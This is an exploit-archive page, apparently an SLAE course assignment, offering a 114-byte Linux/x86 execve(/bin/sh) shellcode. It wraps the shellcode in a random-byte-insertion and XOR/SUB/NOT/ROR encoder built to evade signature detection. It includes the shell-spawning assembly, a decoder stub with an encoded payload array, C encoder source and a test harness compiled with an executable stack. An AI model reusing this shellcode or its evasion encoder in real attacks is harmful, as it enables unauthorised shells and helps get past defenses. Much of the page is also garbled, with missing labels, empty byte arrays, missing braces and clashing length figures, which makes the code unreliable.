Linux/x86 Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode

114 bytes small Linux/x86 random bytes encoder and XOR/SUB/NOT/ROR execve(/bin/sh) shellcode.

MD5 | 6821b8b561a61bc5d34076f52fd398bd

# Title: Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114)
# Author: Xenofon Vassilakopoulos
# Date: 2020-01-01
# Tested on: Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux
# Architecture: i686 GNU/Linux
# Shellcode Length: 114 bytes
# SLAE-ID: SLAE - 1314
# Description: Linux/x86 encoding of random bytes + XOR/SUB/NOT/ROR and also decodes ROL/NOT/ADD/XOR execve(/bin/sh) shellcode

---------------------- execve-stack /bin/sh --------------------------------

global _start
section .text
xor eax, eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push eax
mov edx, esp
push ebx
mov ecx, esp
mov al, 11
int 0x80

----------------------- Original Shellcode ---------------------------------


----------- Decoder ROL/NOT/ADD/XOR + Removing inserted random bytes -------

global _start

section .text

jmp short call_shellcode
pop esi
push esi
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov dl, len
;; apply the decoding scheme
rol byte [esi], 4
not byte [esi]
add byte [esi], 2
xor byte [esi], 0x2c
inc esi
cmp cl, dl
je init
inc cl
jmp short rotate

pop esi
lea edi, [esi +1]
xor eax, eax
mov al, 1
xor ecx, ecx

cmp cl, dl
je EncodedShellcode
mov bl, byte [esi + eax + 1]
mov byte [edi], bl
inc edi
inc cl
add al, 2
jmp short decode

call decoder
EncodedShellcode: db 0x4e,0xc1,0x51,0x2f,0x58,0x3c,0xdb,0xac,0xef,0x82,0xef,0x1c,0x2a,0xd9,0xdb,0x90,0xdb,0x6b,0xef,0x61,0x3b,0x1c,0xcb,0x24,0xfb,0xd6,0xc5,0x50,0x23,0xfa,0x58,0x9c,0xc5,0xb1,0x33,0x97,0x28,0x31,0xc5,0xaa,0x43,0xf9,0x56,0xf4,0xad,0xc2,0x02,0x16,0x55,0xe3
len equ $-EncodedShellcode

--------- Encoder - Random Bytes Insertion + XOR/SUB/NOT/ROR ---------------

[email protected]:~/Documents/Assignment4$ gcc -o encoder encoder.c
[email protected]:~/Documents/Assignment4$ ./encoder



Shellcode Length 25

Decoded Shellcode:


Encoded shellcode


Encoded Shellcode Length 50

[email protected]:~/Documents/Assignment4$ cat encoder.c

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>

#define DEC 0x2 // the value that will be used to substract every byte
#define XORVAL 0x2c // the value that will be used to xor with every byte

// execve stack shellcode /bin/sh
unsigned char shellcode[] = \

void main()
int rot = 4; //right rotation 4 bits
int o;
for (o=0; o<strlen(shellcode); o++) {
printf("\\x%02x", shellcode[o]);
printf("\n\nShellcode Length %d\n",sizeof(shellcode)-1);
printf("\n\nDecoded Shellcode:\n\n");
for (o; o<strlen(shellcode); o++) {
printf("0x%02x,", shellcode[o]);
int i;
unsigned char *buffer = (char*)malloc(sizeof(shellcode)*2);
srand((unsigned int)time(NULL));
unsigned char *shellcode2=(char*)malloc(sizeof(shellcode)*2);
// placeholder to copy the random bytes using rand
unsigned char shellcode3[] = "\xbb";
int l = 0;
int k = 0;
int j;
// random byte insertion into even location
for (i=0; i<(strlen(shellcode)*2); i++) {
// generate random bytes
buffer[i] = rand() & 0xff;
memcpy(&shellcode3[0],(unsigned char*)&buffer[i],sizeof(buffer[i]));
k = i % 2;
if (k == 0)
shellcode2[i] = shellcode[l];
shellcode2[i] = shellcode3[0];
// apply the encoding scheme
for (i=0; i<strlen(shellcode2); i++) {
// XOR every byte with 0x2c
shellcode2[i] = shellcode2[i] ^ XORVAL;
// subtract every byte by 2
shellcode2[i] = shellcode2[i] - DEC;
// one's complement negation
shellcode2[i] = ~shellcode2[i];
// perform the ROR method
shellcode2[i] = (shellcode2[i] << rot) | (shellcode2[i] >> sizeof(shellcode2[i])*(8-rot));
// print encoded shellcode
printf("\nEncoded shellcode\n\n");
for (i; i<strlen(shellcode2); i++) {
printf("0x%02x,", shellcode2[i]);
printf("\n\nEncoded Shellcode Length %d\n",strlen(shellcode2));

----------------------------------- Shellcode -------------------------------------

[email protected]:~/Documents/Assignment4$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
[email protected]:~/Documents/Assignment4$ ./shellcode
Shellcode Length: 117
$ whoami

[email protected]:~/Documents/Assignment4$ cat shellcode.c
#include <stdio.h>
#include <string.h>

unsigned char code[] = \


int main()
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;

Related Posts